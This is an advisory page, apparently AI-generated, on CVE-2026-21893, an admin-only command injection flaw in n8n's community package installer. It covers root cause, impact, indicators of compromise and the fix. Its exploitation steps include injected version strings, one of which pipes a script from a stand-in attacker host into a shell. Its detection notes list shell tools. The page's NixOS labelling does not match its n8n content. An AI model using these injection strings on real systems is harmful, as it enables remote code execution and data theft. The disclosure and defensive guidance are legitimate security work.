CVE-2026-21893: 
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-21893 is a command injection vulnerability in n8n's community package installation functionality, classified under CWE-78 (OS Command Injection) and CWE-20 (Improper Input Validation). It affects n8n versions 0.187.0 through 1.120.2 (the npm package for Node.js) and was disclosed on February 4, 2026, via a GitHub Security Advisory. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) and a CVSS v4.0 base score of 9.4 (Critical) (Github Advisory, n8n Advisory).

Technical details

The root cause is insufficient validation of the package version string supplied during community node installation. The parseNpmPackageName function and the install/update controller endpoints in community-packages.service.ts and community-packages.controller.ts did not validate the version parameter against a semver format before incorporating it into npm shell commands, enabling OS command injection via specially crafted version strings (e.g., 0.1.29#;ls) (n8n Commit). The fix adds a semver.valid() check that rejects any version string that does not conform to valid semver syntax, throwing a BadRequestError or UnexpectedError before the value reaches the shell (n8n Commit). Exploitation requires authenticated administrative access to the n8n instance; no unauthenticated or low-privilege attack path exists (Github Advisory).

Impact

Successful exploitation allows an authenticated administrator to execute arbitrary OS commands on the n8n host with the privileges of the n8n process, resulting in high impact to confidentiality, integrity, and availability of the system. An attacker could exfiltrate sensitive workflow data, credentials stored in n8n, or environment variables; modify or delete data; or disrupt service availability. Because n8n often integrates with external services and APIs, a compromised host could also serve as a pivot point for lateral movement into connected systems (Github Advisory, n8n Advisory).

Exploitability

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the disclosure date (Github Advisory). The EPSS score is approximately 0.47% (49th percentile), indicating a relatively low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained to users with administrative credentials, significantly limiting the attacker pool. The vulnerability was reported by researcher berkdedekarginoglu (n8n Advisory).

Exploitation steps

  1. Obtain Administrative Access: Authenticate to the n8n instance using valid administrative credentials, either legitimately held or obtained through credential theft/phishing.
  2. Navigate to Community Package Installation: Access the n8n admin UI or API endpoint responsible for installing community nodes (e.g., the /api/v1/community-packages endpoint).
  3. Craft Malicious Version String: Prepare a package installation request with a version parameter containing OS command injection syntax, such as 0.1.29#;id or 0.1.29;curl attacker.com/shell.sh|sh, which bypasses the (pre-patch) lack of semver validation.
  4. Submit the Request: Send the crafted install or update request via the n8n UI or directly via the API. The unsanitized version string is passed to the underlying npm shell command.
  5. Achieve Command Execution: The injected command executes on the n8n host under the process's OS user account, enabling data exfiltration, reverse shell establishment, or further system compromise (n8n Commit, n8n Advisory).

Indicators of compromise

  • Network: Unexpected outbound connections from the n8n host to external IPs or domains shortly after community package install/update API calls; DNS lookups for attacker-controlled domains originating from the n8n process.
  • Logs: n8n API logs showing POST requests to /api/v1/community-packages with version parameters containing shell metacharacters (e.g., ;, |, #, &, $(, `); npm execution logs with anomalous command arguments.
  • Process: Unusual child processes spawned by the n8n Node.js process (e.g., /bin/sh, curl, wget, bash, python) visible in process trees; unexpected cron jobs or scheduled tasks created under the n8n service account.
  • File System: New or modified files in the n8n installation directory or temp directories not associated with legitimate package installs; presence of web shells or reverse shell scripts.

Mitigation and workarounds

Users should upgrade n8n to version 1.120.3 or later, which adds semver validation to the package version parameter in both the install and update endpoints, fully resolving the vulnerability (Github Advisory, n8n Commit). As interim mitigations, restrict administrative access to the n8n instance to only fully trusted users, disable community package installation if not required, and limit network access to the n8n admin interface. Ensure n8n instances are not exposed to the public internet without strong authentication controls.

Community reactions

Coverage of CVE-2026-21893 appeared alongside reporting on a broader set of n8n vulnerabilities disclosed around the same time, with CSO Online noting "six more vulnerabilities found in n8n automation platform" (CSO Online). BeyondMachines reported on n8n patching "critical command injection and sandbox escape flaws" in the same release cycle (BeyondMachines). The n8n maintainers characterized the severity as "Low" in their own advisory despite the high CVSS scores, emphasizing that the vulnerability does not meaningfully expand the threat model for administrative users (n8n Advisory).

Additional resources


Source: This report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103678HIGH8.1
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103680MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103679MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103497MEDIUM5.5
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026
CVE-2026-103496MEDIUM5.4
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management